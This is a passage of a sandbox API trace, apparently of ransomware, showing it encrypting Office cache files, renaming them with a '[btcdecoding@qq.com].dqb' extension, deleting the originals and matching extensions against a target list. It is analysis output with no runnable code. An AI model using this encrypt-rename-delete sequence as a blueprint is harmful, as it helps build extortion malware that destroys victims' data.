CloseHandle (hObject=0x1e4) returned 1 [0043.602] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 0x2020 [0043.602] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.602] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0043.602] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.602] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.602] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.749] GetLastError () returned 0x0 [0044.749] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x7eda0, lpOverlapped=0x0) returned 1 [0044.835] WriteFile (in: hFile=0x200, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x7edb0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x7edb0, lpOverlapped=0x0) returned 1 [0044.843] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.843] WriteFile (in: hFile=0x200, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.843] SetEndOfFile (hFile=0x200) returned 1 [0044.844] CloseHandle (hObject=0x200) returned 1 [0044.844] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.844] SetEndOfFile (hFile=0x1e4) returned 1 [0044.848] CloseHandle (hObject=0x1e4) returned 1 [0044.848] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.848] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 1 [0044.848] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.848] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.848] lstrlenW (lpString=".doc") returned 4 [0044.848] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0044.849] lstrlenW (lpString=".docx") returned 5 [0044.849] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0044.849] lstrlenW (lpString=".pdf") returned 4 [0044.849] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0044.849] lstrlenW (lpString=".xls") returned 4 [0044.849] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0044.849] lstrlenW (lpString=".xlsx") returned 5 [0044.849] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0044.849] lstrlenW (lpString=".ppt") returned 4 [0044.849] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0044.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.849] lstrlenW (lpString=".zip") returned 4 [0044.849] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0044.849] lstrlenW (lpString=".rar") returned 4 [0044.849] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0044.849] lstrlenW (lpString=".bz2") returned 4 [0044.849] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0044.849] lstrlenW (lpString=".7z") returned 3 [0044.849] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0044.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.849] lstrlenW (lpString=".dbf") returned 4 [0044.849] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0044.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.849] lstrlenW (lpString=".1cd") returned 4 [0044.849] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0044.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.849] lstrlenW (lpString=".jpg") returned 4 [0044.849] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0044.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.849] lstrlenW (lpString=".doc") returned 4 [0044.849] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0044.849] lstrlenW (lpString=".docx") returned 5 [0044.849] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0044.849] lstrlenW (lpString=".pdf") returned 4 [0044.850] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0044.850] lstrlenW (lpString=".xls") returned 4 [0044.850] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0044.850] lstrlenW (lpString=".xlsx") returned 5 [0044.850] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0044.850] lstrlenW (lpString=".ppt") returned 4 [0044.850] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0044.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.850] lstrlenW (lpString=".zip") returned 4 [0044.850] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0044.850] lstrlenW (lpString=".rar") returned 4 [0044.850] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0044.850] lstrlenW (lpString=".bz2") returned 4 [0044.850] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0044.850] lstrlenW (lpString=".7z") returned 3 [0044.850] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0044.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.850] lstrlenW (lpString=".dbf") returned 4 [0044.850] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0044.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.850] lstrlenW (lpString=".1cd") returned 4 [0044.850] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0044.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0044.850] lstrlenW (lpString=".jpg") returned 4 [0044.850] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0044.850] lstrcmpiW (lpString1=".MST", lpString2=".dqb") returned 1 [0044.850] lstrlenW (lpString="ShellUI.MST") returned 11 [0044.850] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0044.851] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=3584) returned 1 [0044.851] CloseHandle (hObject=0x1e4) returned 1 [0044.851] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 0x2020 [0044.851] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.851] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0044.851] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.851] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.851] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.851] GetLastError () returned 0x0 [0044.851] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0xe00, lpOverlapped=0x0) returned 1 [0044.853] WriteFile (in: hFile=0x200, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xe10, lpOverlapped=0x0) returned 1 [0044.854] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.854] WriteFile (in: hFile=0x200, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.854] SetEndOfFile (hFile=0x200) returned 1 [0044.854] CloseHandle (hObject=0x200) returned 1 [0044.854] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.854] SetEndOfFile (hFile=0x1e4) returned 1 [0044.855] CloseHandle (hObject=0x1e4) returned 1 [0044.855] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.855] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 1 [0044.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.855] lstrlenW (lpString=".doc") returned 4 [0044.856] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0044.856] lstrlenW (lpString=".docx") returned 5 [0044.856] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0044.856] lstrlenW (lpString=".pdf") returned 4 [0044.856] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0044.856] lstrlenW (lpString=".xls") returned 4 [0044.856] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0044.856] lstrlenW (lpString=".xlsx") returned 5 [0044.856] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0044.856] lstrlenW (lpString=".ppt") returned 4 [0044.856] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0044.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.856] lstrlenW (lpString=".zip") returned 4 [0044.856] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0044.856] lstrlenW (lpString=".rar") returned 4 [0044.856] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0044.856] lstrlenW (lpString=".bz2") returned 4 [0044.856] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0044.856] lstrlenW (lpString=".7z") returned 3 [0044.856] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0044.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.856] lstrlenW (lpString=".dbf") returned 4 [0044.856] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0044.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.856] lstrlenW (lpString=".1cd") returned 4 [0044.856] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0044.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.856] lstrlenW (lpString=".jpg") returned 4 [0044.856] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0044.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.856] lstrlenW (lpString=".doc") returned 4 [0044.856] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0044.856] lstrlenW (lpString=".docx") returned 5 [0044.857] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0044.857] lstrlenW (lpString=".pdf") returned 4 [0044.857] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0044.857] lstrlenW (lpString=".xls") returned 4 [0044.857] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0044.857] lstrlenW (lpString=".xlsx") returned 5 [0044.857] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0044.857] lstrlenW (lpString=".ppt") returned 4 [0044.857] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0044.857] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.857] lstrlenW (lpString=".zip") returned 4 [0044.857] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0044.857] lstrlenW (lpString=".rar") returned 4 [0044.857] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0044.857] lstrlenW (lpString=".bz2") returned 4 [0044.857] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0044.857] lstrlenW (lpString=".7z") returned 3 [0044.857] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0044.857] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.857] lstrlenW (lpString=".dbf") returned 4 [0044.857] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0044.857] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.857] lstrlenW (lpString=".1cd") returned 4 [0044.857] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0044.857] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.857] lstrlenW (lpString=".jpg") returned 4 [0044.857] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0044.858] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0044.858] lstrlenW (lpString="AccessMUI.msi") returned 13 [0044.858] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0044.858] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=2517504) returned 1 [0044.859] CloseHandle (hObject=0x1e4) returned 1 [0044.859] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi")) returned 0x2020 [0044.859] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.859] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0044.859] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0044.859] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.859] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.859] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.120] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.120] ReadFile (in: hFile=0x1e4, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.230] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.231] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.231] ReadFile (in: hFile=0x1e4, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.312] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.312] WriteFile (in: hFile=0x1e4, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0045.698] SetEndOfFile (hFile=0x1e4) returned 1 [0045.698] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0045.702] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.702] WriteFile (in: hFile=0x1e4, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.703] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.703] WriteFile (in: hFile=0x1e4, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.708] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.708] WriteFile (in: hFile=0x1e4, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.711] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0045.711] CloseHandle (hObject=0x1e4) returned 1 [0045.711] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.711] lstrlenW (lpString=".doc") returned 4 [0045.711] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.711] lstrlenW (lpString=".docx") returned 5 [0045.711] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.711] lstrlenW (lpString=".pdf") returned 4 [0045.711] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.711] lstrlenW (lpString=".xls") returned 4 [0045.711] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.712] lstrlenW (lpString=".xlsx") returned 5 [0045.712] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.712] lstrlenW (lpString=".ppt") returned 4 [0045.712] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.712] lstrlenW (lpString=".zip") returned 4 [0045.712] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.712] lstrlenW (lpString=".rar") returned 4 [0045.712] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.712] lstrlenW (lpString=".bz2") returned 4 [0045.712] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.712] lstrlenW (lpString=".7z") returned 3 [0045.712] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.712] lstrlenW (lpString=".dbf") returned 4 [0045.712] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.712] lstrlenW (lpString=".1cd") returned 4 [0045.712] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.712] lstrlenW (lpString=".jpg") returned 4 [0045.712] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.712] lstrlenW (lpString=".doc") returned 4 [0045.712] lstrcmpiW 